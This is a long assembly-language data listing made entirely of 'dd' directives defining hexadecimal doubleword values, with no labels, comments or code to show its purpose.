dd 0B2F12C69h, 9B0039FBh, 79E5E9C7h, 17EC6FFh, 9852BA42h
dd 70F82F65h, 7B00967Fh, 9329A41Ch, 0FA165DC5h, 0FE8100E5h
dd 8E5B070Ah, 0ED07B9D9h, 3FA7FBECh, 0B385AB00h, 5874AFh
dd 0A8607116h, 46041DFFh, 9F4EE000h, 90AC5470h, 98C002D1h
dd 94BE1861h, 32CEE1E0h, 0E1BF5903h, 0E9A11D5Fh, 0C2D43DE7h
dd 7F8A0062h, 0AC3E1A51h, 13397AB8h, 0D74A80F7h, 320A4811h
dd 8349180Bh, 0A299947Bh, 33920900h, 4489B11Eh, 855A07FDh
dd 3B02C93h, 0FAA043E2h, 8171BE97h, 37D7F31Fh, 8800BD9Eh
dd 0A1CB8A3Dh, 1AEC0B3Fh, 7800F6A7h, 9C95B91Fh, 0D7818307h
dd 46815BF2h, 0E260FEBAh, 0F4ECCEh, 2766A1E8h, 8CFD83FFh
dd 0E9958F00h, 1439CCD6h, 5B2F0087h, 0CF405504h, 0D9079D92h
dd 5E770E11h, 0F0F4C060h, 0C79F01B9h, 2D1EBE64h, 9773E057h
dd 3F43A900h, 9DAD5AC6h, 3B480093h, 670716A8h, 56003750h
dd 13438F05h, 0EBE972h, 5E383B9Bh, 6B46BC5Ch, 1F123600h
dd 2853EF31h, 0B8C100F7h, 79AC0249h, 6A000B40h, 83DE6B01h
dd 1623F564h, 9543E4h, 12043EEFh, 1C0791D6h, 0B82729D9h
dd 5840F180h, 36632639h, 0DEA00042h, 0FC652AC3h, 0F0018300h
dd 85AAB17Dh, 49EC000Ah, 0A1932F04h, 531FF5D9h, 0F81B258h
dd 2E7CD5CCh, 50E3ECh, 72661E42h, 0BCCF0D80h, 1D9AA62Eh
dd 633D39h, 0FE2E4406h, 8A4ACCh, 0AC76F475h, 670F04B2h
dd 0EBBF9700h, 3C87157h, 75DF00CCh, 25094B30h, 767A16E4h
dd 41F67C0Eh, 448D213Fh, 0BEC35F0h, 0FC4600C0h, 5906A737h
dd 0D9E86FBCh, 0F4041F00h, 0B4A6A3A9h, 0A1C3071Ah, 1EAF0FC7h
dd 0A0AB4C87h, 0B2255A1Bh, 52C4D22Ch, 5437C00h, 0B89ED7C5h
dd 3CD55C06h, 81CA3E00h, 0E695DA9h, 980A8C00h, 0F1BFF34Bh
dd 306000CEh, 0FF3AAB75h, 5E7ADE24h, 7ECD3Dh, 7AFEA2DBh
dd 26693390h, 0EE259h, 48C95AA6h, 0D500C77Fh, 4A03FB39h
dd 132114Eh, 92DF55D8h, 0C88AC215h, 6203F5E8h, 5FB7396Dh
dd 0ACAA98DBh, 752348B9h, 1A2F6C02h, 5160C05Eh, 0C200DB2Dh
dd 0FBF6BF8Fh, 0F86327AEh, 0F01500CDh, 0DB1B0412h, 9A007774h
dd 0CC4A73F2h, 0BD459Eh, 0EC48E964h, 0A3C42665h, 8087FD01h
dd 7BAB985Ch, 9002D8h, 9315F67h, 62925D1Dh, 65044C00h
dd 0F2E9226Bh, 103D00A7h, 293CF0CEh, 0DD00D2EEh, 0B4B5BA5Eh
dd 3494BCFh, 9E5B15D4h, 0F0D73993h, 98165F7Ch, 3E2B3100h
dd 0BEAA59E9h, 65D81E99h, 0A4D9C009h, 0ACC30E1Eh, 0D4268100h
dd 749153D2h, 0C0E028h, 0E7B6E4B1h, 0C2E08EECh, 296F4E01h
dd 18240BD2h, 805FECh, 0EEFBA258h, 0A402FCFEh, 0A1A7300h
dd 0EC60B852h, 0AE7432h, 0D13BBDFh, 0E2EB62DDh, 129EEF00h
dd 3D202B4h, 3ECC0597h, 807BBA96h, 40802838h, 3200A2F0h
dd 94CEB477h, 8465E2h, 0C33881CCh, 0A18F910Dh, 0C4CAB700h
dd 0D18BD675h, 0A61B0111h, 68C22E8h, 0E25FD854h, 26A04600h
dd 93F8458Dh, 9C9400FCh, 73BECA1Eh, 0F8F1DF7Fh, 0D3EB2F6h
dd 76539DA8h, 0FC2E14C0h, 3DFB9936h, 0C4003F1Ah, 0CF5C7FE3h
dd 0DE1C4CD3h, 1B409FE1h, 1A0BB340h, 1D727EA9h, 5EDB8551h
dd 0B46280AFh, 0EC3559Dh, 0C0A5A207h, 86106322h, 0E636CE72h
dd 0A4AB00B7h, 0DABDED7Dh, 1A1CD3C3h, 1FBE6956h, 21470B2Fh
dd 44118799h, 0B230C62Dh, 5FB80015h, 2CC95536h, 881DAD8Dh
dd 0C7C3A513h, 0D03A632Bh, 0F6DE64Bh, 3247E4Ch, 2CF65860h
dd 5101FB04h, 3A025B94h, 1FF8E572h, 47D4396Ch, 57BB8C81h
dd 0F0F52C26h, 0DB000CE3h, 0DCC3F882h, 97F21Fh, 1213495Ah
dd 9328AA64h, 7100047Bh, 0AFBBB395h, 0E759DEFh, 0A7EEDF0Fh
dd 0BCA60DA0h, 4400A076h, 0C79E428Bh, 0BE2A08h, 0AAAC247Dh
dd 682E6BB3h, 470B0100h, 0A0B8AB8Ch, 0A51100BFh, 6EA9DE6Dh
dd 0BD002D4Eh, 75630770h, 46686Bh, 0D9D013D8h, 2C83147Eh
dd 9A00EA72h, 1702D4ADh, 147E19Dh, 0B4EDD507h, 0CE3FB587h
dd 362C80F5h, 23986Bh, 6263F1CDh, 0BD2EFC58h, 179EC01Ch
dd 4AFFE680h, 7C16B9Ah, 89047A5Ch, 8EA3001Fh, 2D005753h
dd 0BBDD848Ah, 3DCB6424h, 470F66C6h, 89E10E04h, 7BFE8DD5h
dd 8B7D6C00h, 1AFD6ECh, 5AC5B0E6h, 0DC2F626Fh, 7BE81057h
dd 6FBA300h, 227134C0h, 0B8F6006Eh, 50F9CDB3h, 2700ADF1h
dd 951D7CC6h, 5A6A42h, 8B3AFF89h, 5E64D37Fh, 0AE9CA00h
dd 53F22E47h, 0DDF0375h, 0A9A7CF01h, 7FE5B4E8h, 3B041674h
dd 55A32799h, 39FD52C0h, 11EF0074h, 6640A5EBh, 2900D396h
dd 0D9FB42B0h, 2DAFFB4h, 0CEA4613Ah, 6E6060FAh, 6200D3FCh
dd 19181D26h, 216C1Eh, 0EB6D8B92h, 8E4BD753h, 940EC875h
dd 39984Eh, 7DD54257h, 0C5D203F5h, 49C62B2Fh, 0B99C4488h
dd 11AE4E01h, 0B8EF08D4h, 0CBC2F8h, 2F7BC790h, 2918763Bh
dd 0CEB5FA01h, 94CF0D3h, 7C62EDCh, 0B7E227CCh, 29E560EFh
dd 1C006F80h, 0D0A37184h, 0B8F45A11h, 176AEC70h, 9E564Ah
dd 182210E8h, 0DF0084B1h, 0D5FB75B9h, 0F98EBCCh, 0E6A1B483h
dd 152CEC80h, 760028B3h, 51DB9DD9h, 0B7F913h, 664B9C86h
dd 82AB33EEh, 0D90039F4h, 9E7EED4Dh, 3D64FBFh, 98CBD36Fh
dd 0AFA83F6Bh, 4C00301Eh, 2EA1FBA9h, 2C87EFh, 0C6339EF3h
dd 413AF0A3h, 3D3BA00h, 0B83D99CFh, 888039D2h, 33C74F00h
dd 0BDC6CEE9h, 0F90440Eh, 0C354E0CBh, 7BD629h, 0AFA43137h
dd 6F46190Dh, 8DAE9800h, 0A720DC10h, 0A030F541h, 0D10B0730h
dd 0D792DBD0h, 33F987CCh, 2E0FA35h, 783F8FD5h, 79748C1h
dd 8DE33CFFh, 7C617470h, 52D3000Dh, 0FFD975Dh, 8C00F942h
dd 3F2E3AAEh, 1C69134Eh, 7CDB3116h, 92EB1980h, 0C8CF60B3h
dd 488B8500h, 1FF353FDh, 0BE2D0081h, 0C2E7944Ah, 0DC0027E2h
dd 0B3C3A1B1h, 8E2259h, 72FB8624h, 9934B6AAh, 0A9144200h
dd 2D374AD2h, 61E800ECh, 0CB464C0Ch, 24381C68h, 7C0500E1h
dd 651D5ACAh, 0C6233B61h, 27E08880h, 0D5ACCFEEh, 979ABA00h
dd 0C3B79F69h, 0FA560E87h, 0D8430318h, 4FD0406Bh, 2400BE42h
dd 41ED3808h, 0ECC00CEBh, 85100006h, 2845C91Fh, 0DD00FEA4h
dd 0D2AEB430h, 942E7Fh, 2DC4C63Dh, 9B2062F2h, 0FD5B4D00h
dd 7130D61Ah, 0EEF60006h, 333A126Eh, 0F0F4E20Fh, 0E9872D00h
dd 290D16CAh, 61EE15h
dd 1BB99DD0h, 5993736Bh, 0A37AB100h, 521DF456h, 7B410037h
dd 5B1E3F35h, 0C400F346h, 0DC82E014h, 712C9629h, 47440093h
dd 0D9C5D023h, 0FD01CC58h, 10F8D8Fh, 5C43536h, 0D07E0EDFh
dd 3440F908h, 0FB8BB90Bh, 3907E807h, 73F047D6h, 4D724BCh
dd 4A6734A5h, 6A09C0EAh, 0B50101E5h, 0F33911B2h, 0BCC50B8h
dd 1AB600CDh, 0B9F857DAh, 0C900A813h, 0D8B5255Dh, 1EC3DFEFh
dd 80558A72h, 0E2DC2106h, 45007F41h, 92086330h, 1E96B023h
dd 400C9D37h, 7F0961E0h, 0E53E8CF2h, 0C0B226E1h, 11A19100h
dd 38755C14h, 70F751h, 24D62E33h, 0A4C93C04h, 2146CA07h
dd 4B00131Dh, 5CEAACh, 9150373Fh, 0A5FD7E12h, 369B9700h
dd 0DA73385Bh, 0A33E00E4h, 8877F313h, 1F00C0FBh, 0A16594Bh
dd 0FA4D9F4Fh, 11BE1C41h, 0B1808070h, 0A5516315h, 8B6EA302h
dd 0C0686DD6h, 695261h, 0CA9D8D9Eh, 76AF4FE0h, 0FBB7C00h
dd 330E3D13h, 0C3C10318h, 0AC69830h, 5C468DE0h, 4F7DF175h
dd 39BCEC00h, 9D0B332Ch, 11DF3D44h, 0A66AEB03h, 808C9561h
dd 0EF5CD42Eh, 0A1BD11Ch, 517EAB00h, 0D9136Eh, 0EA853EB0h
dd 66264F38h, 4E89E800h, 2DD40F63h, 0B470F42h, 120BFC2h
dd 393545CAh, 7500CDE2h, 0A1675E10h, 0A84EE9h, 7D6A71D4h
dd 0D50D87FDh, 3C354900h, 0A69D91B9h, 34CB1F4Eh, 0BF6FC793h
dd 2A89B099h, 3E00FC8Bh, 0FEB287CDh, 0F9C9092h, 5186CB9Fh
dd 0B6BF5DA0h, 230056E8h, 0DBE3432Eh, 0E8B3438h, 0B94B740Fh
dd 0B4DFFF80h, 230013BCh, 383F6D3Ch, 7AE2EF3h, 0EEB2E23Dh
dd 0F9F90D9h, 0D500AA99h, 7D78A7A2h, 9380E6h, 0B3374CA1h
dd 0A5CFA622h, 50F57600h, 481751Eh, 2B3C0249h, 95934268h
dd 112142E0h, 3A175400h, 709B3BD9h, 68D4004Dh, 0EB52DB86h
dd 0BD0097E4h, 781584A9h, 3B2D2CEh, 2AF56672h, 4DD1FECDh
dd 0CCAC8B5h, 61C63E01h, 99A95AB9h, 0ADC570h, 8A3FCF9Bh
dd 2C4E4C39h, 0E5854600h, 7896726Eh, 0B820015h, 6C84F406h
dd 2B01E62Ah, 524AE8B9h, 0BFF4901Ah, 0E5583AA0h, 21A5E280h
dd 0EB08EF56h, 99773B28h, 63939B00h, 0F67F8057h, 46B70E1Fh
dd 262068FBh, 0C972C8C6h, 877EDB00h, 0CABD9CD9h, 0C1130104h
dd 0FF55C44Dh, 22CA408Bh, 0EC00DC31h, 44505FDFh, 0F889603h
dd 622A9301h, 8E2BCC40h, 0FC1C4BB7h, 0A140D477h, 89108FF6h
dd 0B2C30026h, 0A3961880h, 860084D2h, 32AD25F5h, 1E567936h
dd 1A9A72h, 8B23B558h, 113B2AB7h, 2B6413C6h, 0CF904100h
dd 3E69560Eh, 8880BB8Dh, 14831A3Dh, 0B43B672Ch, 9E4D008Bh
dd 613775D9h, 4F60352h, 714A2A1Ch, 1548E1C8h, 72000877h
dd 46A72345h, 0D2BECFh, 0CD743057h, 40EA0FC6h, 0D300ADE2h
dd 8EA5A2BAh, 7F0A198Ah, 9ADB1F4Eh, 0EC05C008h, 0D1092743h
dd 0D9C31200h, 0E02D4CF1h, 3270015Bh, 5CE2D48Fh, 0ECE5F961h
dd 0B11DCFFDh, 0DB40C13Dh, 0DF5B296h, 3D40310h, 536FAF1Ch
dd 0FB0597A0h, 930FFD7Eh, 3DE863A8h, 37608040h, 40B8C4h
dd 0DCAA2D29h, 90950D01h, 33F2EE2h, 1A00F872h, 85808F9Bh
dd 96C569h, 0C9BA76A4h, 5AE4A3EFh, 8D1B780Bh, 13F2002Eh
dd 394EA277h, 0A680E3D0h, 0C9DF6A7Ah, 20EF843h, 20B18D9Fh
dd 93A4DD1Fh, 75E7FA90h, 0E41E005Eh, 492F5026h, 0E30388CBh
dd 6BBD66A7h, 2587E053h, 14150B03h, 0CE874EA4h, 0A63D80AAh
dd 5A003689h, 0E3B40A7Dh, 77A1580h, 79745C68h, 5998701Dh
dd 39006F34h, 0DCBE234Dh, 0C87740h, 0D09EDA4Fh, 8890850Ah
dd 0FEF0E825h, 4A660E3Bh, 56BBA4A0h, 0E007562h, 23A0AA02h
dd 0F99991h, 0F39FCE38h, 5C9EFAA5h, 0BA3A7A00h, 0D8EDEFDDh
dd 3967071Dh, 0F18D74DAh, 0D001D319h, 0BA00CD1Bh, 87103590h
dd 30AF0Bh, 603F388Dh, 74CC1E32h, 24BBEA2Eh, 0F647491Fh
dd 0ECA0CE5Bh, 38B29DAh, 0C2D516C9h, 9C077A0h, 5D002BE7h
dd 9128AB58h, 0F31A11h, 224DAC7Dh, 1B4993D1h, 1D04600h
dd 50580ED2h, 0C58000D6h, 0DA8C61E1h, 2C016224h, 8F059602h
dd 3EC8B1ABh, 4CA6001Ch, 0C8467A3Fh, 0F6009C98h, 0BABBC607h
dd 0F264D5h, 0B6BE502h, 51E25B84h, 0F7A43700h, 0C9C04A40h
dd 46B600B0h, 3BF97753h, 0E600CC16h, 0C828AD1Eh, 7C531D3h
dd 872EDC99h, 30347071h, 0B9038EE3h, 5E880140h, 99F00302h
dd 0B3800A32h, 0F09ECE00h, 0D0673694h, 919C010Eh, 14CA6685h
dd 9B7FCC25h, 9DC49001h, 0ED96883Ah, 0EB820BC4h, 3AA521F8h
dd 500003EEh, 90242637h, 0A7007028h, 0B233D8D1h, 0F21A71h
dd 87062E81h, 448817C0h, 4EFC300h, 1E1C8672h, 0A0F40162h
dd 0BC2F163Ch, 8420C080h, 76263A03h, 561981h, 62D151Ch
dd 4CC639DDh, 0BE6EF07h, 3A60D71Eh, 1F8299h, 209F3156h
dd 0AA0AA61Ah, 0E90E39FEh, 83698487h, 0E03CBCF0h, 7BDDF12h
dd 0D436E542h, 75AC00F5h, 0EF18628Fh, 7196BAE7h, 0F21BEADAh
dd 0BE480015h, 994C3E56h, 0F40033E1h, 0D085BC98h, 17B79h
dd 0DF3C0610h, 69F18A9Dh, 0B045570Fh, 0AFBB2094h, 0D182F9h
dd 172CDC3Fh, 2BA93C4h, 34F7600h, 0B87DCBC0h, 6C800081h
dd 9EB27FDBh, 6D9089F9h, 8C673300h, 55B995FFh, 0AB052E71h
dd 8F2703A3h, 0DA8D0E0h, 0EC007093h, 0BCB5833Ch, 9C99B8h
dd 17B1DDC4h, 75D5E4ABh, 80AA943Fh, 0AC682A96h, 0EE8458h
dd 369C08A8h, 599F4D4Ch, 55811400h, 0DA342DCBh, 0B2840F85h
dd 0DF4005C9h, 0A4B0F858h, 0B51A9E00h, 48FC3964h, 3B7F14D1h
dd 691EA7E6h, 5BDA806Bh, 6CBE0FB6h, 8A493C00h, 0CFAFB190h
dd 73920153h, 8F3B0965h, 98B683A1h, 0C0E2CCE7h, 0E92355h
dd 7A8161BEh, 0BB4E4609h, 73103300h, 99ABBF3Fh, 957327h
dd 0CE07183Ah, 1C604AAFh, 0ED617F03h, 80129322h, 7EA4DF36h
dd 7C2700C5h, 50A36A84h, 0E2F01AE8h, 0F81ECEB8h, 0B741FEB3h
dd 0CB1B7A76h, 406F70h, 6E7B6204h, 919DC332h, 803D3600h
dd 6341DD67h, 2E690097h, 0A57DA69Ah, 0DE009CEBh, 0FE9BE8BEh
dd 0CEF94Bh, 30B5E40Ch, 0C2560893h, 0BBEEF200h, 19DBFF7Eh
dd 0FA30099h, 0B42621F9h, 0F2052455h, 0FA96C232h, 7177BC00h
dd 0B9C06Eh, 0A51DCBFCh, 304D9484h, 8C7ACA03h, 0C8E73E47h
dd 12BEF38h, 0D1D0DC4Ch, 0F431C6E4h, 0F7005728h, 89A5929Dh
dd 0D24CA9h, 9A17C370h, 7313EE14h, 0FCDFFE00h, 67B7328Dh
dd 0AD960025h, 8CEBBA70h, 6500C358h, 9CD6C2A8h, 0D01629h
dd 0B5A73BB3h, 0E666B635h, 0D809AF1Eh, 0AE1D2380h, 0A612FAh
dd 981E7DCAh, 58227762h, 68EFAC0Eh, 0E04CE050h, 438C83h
dd 3B1F4B8Eh, 8DF21760h, 54D9391Ch, 16483D40h, 1CCBD29h
dd 3F076E02h, 0CC5A5398h, 62009170h, 30C5798Fh, 8DC7C6h
dd 31324014h, 0C46849FBh, 0F72FBF00h, 0EB75AE8Ch, 0B11E1EC5h
dd 2301FB18h, 2316CF4h, 0C324F8CFh, 698FC126h, 0E9570900h
dd 0F97D43h, 6493D996h, 0B31D397Ah, 0CFA80400h, 3CD34C4Fh
dd 0D4EB0050h, 4DF697A9h, 461EE7BBh, 0D54E5326h, 80774F49h
dd 8E432B3h, 0FAEA1FE6h, 8E93D3h, 0F4FE48F5h, 2107063Eh
dd 65293497h, 7D1C0560h, 64A93A55h, 0EE402480h, 3D23F257h
dd 2A7A7100h, 0A2495867h, 3B5E0054h, 0E3A7E4CBh, 912CEBC6h
dd 2F83BEh, 21925D40h, 1B18032Dh, 2BB01D1Fh, 0A8E9D988h
dd 60000FF8h, 97B7E767h, 1DDF0661h, 0A78DFDh, 0A110317Eh
dd 7038F736h, 150376A8h
dd 2057C0ABh, 0A56CE0EDh, 3F320034h, 498D85D3h, 0EA009641h
dd 0BAD18004h, 56F8F8Eh, 0EC5E5F0Fh, 13C4C0E8h, 783C2659h
dd 1247061h, 2200BAC2h, 877645F4h, 3D6E0717h, 0F1EB23C8h
dd 20C3F2DFh, 20FE6BC5h, 0D60968F0h, 0D507292Ah, 83679F81h
dd 8DD7F4F2h, 0ECEB8016h, 96369400h, 3DF72A5h, 2D2CB2FFh
dd 12F0CA4Eh, 0BD09A9D5h, 80952337h, 89272D2h, 0F5C90021h
dd 0AB1D3FC5h, 960069F8h, 8165CF4Eh, 7DE430AAh, 61990019h
dd 0EF8B9FFDh, 90004B34h, 4E7618CCh, 0FCFA4C92h, 0F58000AEh
dd 0E862F88Eh, 2F00F21Bh, 0D74FA5F1h, 1FEEF090h, 0C3A803F9h
dd 5760259Dh, 0D1918E90h, 0A510EB09h, 0FA2C80B5h, 311554Ch
dd 0BA5978D6h, 93D06713h, 4700068Dh, 0CD4CB76Eh, 5C1F724Bh
dd 9E007CE4h, 3B3F526Ah, 90039489h, 0A5326C49h, 0E3449865h
dd 0EB250AEEh, 3ECD614h, 0AE9C9B98h, 18D502D0h, 4EDB1900h
dd 2196F38Ch, 7E40FB1h, 0D24FDD37h, 0AE32E2C0h, 8500C7A9h
dd 0F9EBEAF1h, 332F43h, 0FF0F692h, 1DD97773h, 57ECE900h
dd 0EAD04FFBh, 1D3E81Bh, 0BEE16434h, 0FB44E454h, 51F87FDBh
dd 6B382987h, 953E0392h, 80B1BAAAh, 0B884F0h, 81991289h
dd 0C7C1F385h, 751925Ch, 0F83491A0h, 0BB655720h, 88CA0183h
dd 414B12DCh, 0DA58608Ah, 0A1181500h, 0CC24074h, 682300DEh
dd 62823046h, 0EB000AA9h, 289AB127h, 7A18077Bh, 8B73DAh
dd 62EC4F78h, 3AE68A2Eh, 919AA900h, 947C36A3h, 7808757Fh
dd 0BC950069h, 0B94BFA6Ah, 0AC00C284h, 0B69C2503h, 962AC0h
dd 0C1BAB3A6h, 404DF795h, 0D90EE300h, 80D5B812h, 5CDC0024h
dd 0D2066A8Dh, 0A82E4E69h, 94002466h, 0A9C821C6h, 0E5F700C2h
dd 45954468h, 2000BAF6h, 929AE356h, 0FB773206h, 0CE0770h
dd 601E63CBh, 0C7D31688h, 0C8A55200h, 0F47DAD95h, 0BB8EA13h
dd 0E8BA8929h, 94355E81h, 431DECD0h, 818BCE00h, 10731215h
dd 0DD2000ACh, 69A2A00Dh, 0D7002A31h, 0A77A9AEBh, 5C10B5B1h
dd 0B800D530h, 9FDF523Ch, 0D80044E6h, 815F1A1Fh, 0E07B55D6h
dd 7D2F00ADh, 0D37AF213h, 0AE00ACCBh, 0E5265DB1h, 848EC5h
dd 999033F3h, 4B81EC91h, 345F2507h, 0B6B09C0Eh, 0F3C5E05h
dd 331279E6h, 0DAFDBBE0h, 563C656Bh, 0A0A18F8Ah, 40E8AF43h
dd 0E690F147h, 146700C7h, 6E72E192h, 4C00557Ch, 0BCB044B1h
dd 71035B7h, 2AE4E516h, 25289022h, 0DF001EF6h, 464EB6C6h
dd 0A1E294h, 0BCD60580h, 0DD95BA47h, 3E008D78h, 9CF2A23Ch
dd 0B3570Eh, 7EEBB035h, 1055888Bh, 5C862300h, 0F084DEACh
dd 0E87C0F63h, 7A40C7BFh, 0C3A8846h, 3D127400h, 43F3806Ch
dd 821807F1h, 508C7C08h, 0EE06831Dh, 53E38401h, 99FA94C9h
dd 7C93BEE4h, 6C901E0Ah, 3E6D4754h, 0D2B704Ah, 77011B46h
dd 8F888A36h, 0D1C0DEC4h, 0F94D072Ah, 40DABA90h, 0A2660292h
dd 1701AEF6h, 295DF226h, 2EE4D297h, 8250FF0h, 0BEC014CFh
dd 58FA98D5h, 0BAAD9F0Eh, 77C580D2h, 0E4E92Bh, 729CEF87h
dd 67E8D74Bh, 0F976A700h, 0B030E545h, 6CE002Ch, 3F81B668h
dd 0A60E1D15h, 40F962A2h, 695BF54Eh, 29DE00FFh, 1A9C98AAh
dd 87007B80h, 0B57C576Ah, 1C33A30Dh, 6B68C6h, 2862D898h
dd 5507D173h, 5FC17F42h, 0B6650140h, 0E9EA0040h, 0F176E7D0h
dd 3700D63Bh, 3C602DD8h, 9B034A7h, 0F4696B20h, 885D6900h
dd 0BD001004h, 33566EC2h, 776B308h, 0B91EC3D4h, 778402Eh
dd 0DB007D9Eh, 0DBE6659h, 5C3810h, 35E31A95h, 246874E8h
dd 0F28C3700h, 87F8F465h, 0E670FDh, 9D21A07Fh, 90064515h
dd 7B187900h, 0F2037092h, 5AA63E01h, 0FCC12C8Fh, 82566880h
dd 7D0708F6h, 0ADD0CBF8h, 58475500h, 4157A5Eh, 0BBFA2737h
dd 30D8C050h, 0AB000313h, 851B28B3h, 4CF44799h, 6D00E493h
dd 0D8C381DFh, 6F030298h, 49B81FECh, 8F23A08Eh, 6544031Dh
dd 89CF01A5h, 0D7D7490h, 0EC719309h, 14A40779h, 4952BE60h
dd 0C7EB3F67h, 1D13BB8Fh, 8C463B20h, 0C8009A7Ah, 0E3E4B383h
dd 114EB4h, 0A4AC38F7h, 5223620Fh, 0BAF5E900h, 4BD5962Fh
dd 7A17037Eh, 930F79Bh, 0C9337090h, 89FF9700h, 8BBA8190h
dd 0CCB0DFh, 287D95F5h, 0C204730Eh, 0AF2C6600h, 1ED40AE7h
dd 0F54900C3h, 0CFF1C601h, 0FD01ADF7h, 0BA635EE1h, 0D0CC253Ch
dd 7A690EB3h, 41A4E65Bh, 0B9628072h, 10009FD9h, 0ED381562h
dd 3ACFB7h, 0AC776EB5h, 6F4EB833h, 3F61BD00h, 0F9EFADB0h
dd 0C8B5C31h, 5A62D500h, 0C4CE493Ch, 90E8E417h, 79997300h
dd 0AACF40h, 2C8DCC3Dh, 5D7EF1DEh, 63A1EF00h, 3D50C82h
dd 46A21CD0h, 0F21F80D8h, 4C242CA9h, 752AEE03h, 99BEC992h
dd 0F2701A33h, 76C01E8h, 0D9F046C5h, 195D2077h, 4505F570h
dd 44A49A61h, 0A29FD780h, 82393ADEh, 0A8BF1280h, 0FFA09EC7h
dd 895E4201h, 0D8C09524h, 392A130h, 0C9CB53FCh, 8FF04460h
dd 481E6A2Ah, 5940E2E7h, 71152FFBh, 2B31076Ch, 508E68BCh
dd 4FCBF1F9h, 3805C400h, 5B1FDE01h, 0D271A0h, 0FE5AB93Ah
dd 0F558C613h, 3E939h, 4AB46699h, 0E657F7B1h, 7FAC7h, 461D9B3Ch
dd 0C4F41133h, 91C9D90Fh, 0B3B06023h, 61AE48h, 870185CCh
dd 93F002E0h, 46756E00h, 6CA86D0h, 105026D9h, 34EE0068h
dd 55723E22h, 66A23300h, 0C19F857Ah, 0DF730009h, 8DF68388h
dd 1F006CCEh, 0BB87A833h, 1FBCCA24h, 0C78C43DBh, 0F0C440h
dd 0E4C16719h, 0E51EFC03h, 0A8647298h, 0FF236Eh, 4316BD18h
dd 0A1CD4A9Fh, 2B092F00h, 0CEC23FA9h, 51170026h, 0F222D479h
dd 9C006A08h, 0BCD3943h, 0CB6284h, 0BB55495Ah, 157806F5h
dd 750C2E00h, 0EE373F8Dh, 4B870FBEh, 7D0064ABh, 6F7F540Bh
dd 1308D603h, 9905A848h, 11D09728h, 2F3A16F3h, 0A1B507E6h
dd 78CD4010h, 0CE1CDFDBh, 92C065E8h, 0B71CB0E9h, 61490197h
dd 8959F7B2h, 0CC7BD9E4h, 87000DCDh, 458BC714h, 65CC76h
dd 7399DA98h, 0D475948Ch, 72376D00h, 702350FEh, 0EAC4005Fh
dd 0F0675E13h, 81003C9Bh, 0CD73B8B3h, 0FAA9339Eh, 75670B1h
dd 982826DCh, 81001F6Bh, 9E2FB0C6h, 5F491900h, 925C0AB8h
dd 0A7630182h, 0C9F33C9Fh, 1A44D0A6h, 7CCCC500h, 1E6B5B04h
dd 0BA7A26FCh, 0DBC801FDh, 0F40789A0h, 4F00769Eh, 0FD21F2F1h
dd 27677Ch, 54B0B5E0h, 7FB4518Dh, 8AD6EC00h, 0C2970E16h
dd 0C1E80761h, 0C04F8E62h, 0D513E218h, 0DA907400h, 0B64CCBA8h
dd 125D245Bh, 8E9A00C6h, 0F1AC8B10h, 0E233C500h, 644560DDh
dd 0C2C83B06h, 5C1BE803h, 8DD0ECC6h, 0D00035FDh, 3D48C769h
dd 0F219DB0h, 0D1A5F633h, 0DF6B16E0h, 9B03591Fh, 0FE0FDD04h
dd 0F131F091h, 90503838h, 185E9280h, 862E0BC4h, 5A00CE7Fh
dd 0D539328Eh, 711843Fh, 0A1CA5954h, 685300B6h, 0C42ED8EAh
dd 8A000244h, 8C66BAC9h, 1B7F6Ch, 0E25CF8C7h, 0DB5D0FF3h
dd 0B6FF7000h, 0BA050869h, 2887EFE1h, 90EEA90Ch, 0F0C63D51h
dd 0CD7B9500h, 0D5F1AD61h, 0BA1204DBh, 80ECE694h, 9C658C04h
dd 0BCA00500h, 3B216E17h, 0B02D0069h, 5A6D86B7h, 0DA00E391h
dd 0CBC319B5h, 410351h, 60BEA55Fh, 8E27E23h, 7C7A4A7Ah
dd 0A7C38F00h, 0FACFEEBDh, 49FF074Fh, 0F026F553h, 362D470Ch
dd 0AA375700h, 2F31AC3Bh, 40840021h, 0A304398Ch, 10037CBDh
dd 0AB44904Bh, 0AFC0D331h, 6B67AAA0h, 0C874B2h, 0CCD6D0DDh
dd 0EC7ED195h
dd 5004CA0Ah, 78009D21h, 5CBEFF1Ah, 9B5100F5h, 0B790BD8Bh
dd 403C1C7Fh, 394D8799h, 5340F195h, 75A12h, 553689D8h
dd 0CF90CD34h, 74ADEB00h, 0F957458Fh, 643901FFh, 0F5B3318Bh
dd 6635F0F0h, 14ABEA00h, 0D7FD175Eh, 0C11E00CAh, 0C594CDDDh
dd 810033DBh, 0EAF13725h, 14FBB1h, 5F96D332h, 0B709CD31h
dd 0BB737D03h, 0D8D2E8EEh, 0C7E68Ch, 0E2A7A4AEh, 628D974Ch
dd 2EF56800h, 7114D04h, 76E13D38h, 67437480h, 0D5EFF0DBh
dd 69B9E409h, 0FA048095h, 0E53CBE8h, 33A4DAE7h, 9D20114Fh
dd 57D436C7h, 0A36C2C00h, 7BF709BAh, 350700CBh, 3CAF6EC6h
dd 3206278Fh, 1FA2FFFAh, 9B770Eh, 6447F5DAh, 0C6FD06BFh
dd 31AE3600h, 0E201CD10h, 0C2A0005h, 0D9B585A8h, 0A65C8BDAh
dd 2EA20F9Ch, 4F45419Bh, 1AF46592h, 532F009Dh, 0F3E3AC6Bh
dd 0F009371h, 382CFEBFh, 0CCA08Eh, 769F6ADCh, 22A7D363h
dd 21CFAC00h, 68511274h, 255C0041h, 6ED77B7Ah, 0A500AA20h
dd 2ED4B710h, 1F81Fh, 58172974h, 0AA806C3Eh, 48DC7B00h
dd 677A846Eh, 73680064h, 8285C45Dh, 0A400598Ah, 3701AC6Ch
dd 0FEB054h, 0F6E75E4Eh, 0A3F4B53Fh, 0C92BCE00h, 6AA91C17h
dd 6BF4E0h, 0FDACB773h, 9D756754h, 0B6E086FCh, 0C99B8E2Eh
dd 5E52E201h, 5DF4577Bh, 0D11400BAh, 7318B2BDh, 0B300D21Bh
dd 9C6448B9h, 0C0EFB7h, 0D940115h, 0F8455161h, 0E3380A00h
dd 4C3B89C4h, 0B91B002Fh, 3C176506h, 0B10034AAh, 583D238Ch
dd 0F4DE460Dh, 33375DAh, 1C6AEAEFh, 52B08FC3h, 0E70069F3h
dd 0B94BAE8Ch, 60839D5Eh, 1AEC86D2h, 0C8F1115Dh, 0DC009E10h
dd 3D45225Bh, 0F87F86D2h, 90E20923h, 54800C60h, 1930F5B2h
dd 0B5F3F600h, 0C14EC0B9h, 0E0A0088h, 0E5BD4CD6h, 834C3A49h
dd 0BFFA00EFh, 2C552911h, 7DE0BEh, 7EAE1B71h, 0FEF66542h
dd 0C199B200h, 6BF911CBh, 0B676F3h, 0A7693C4Eh, 0A5D22D04h
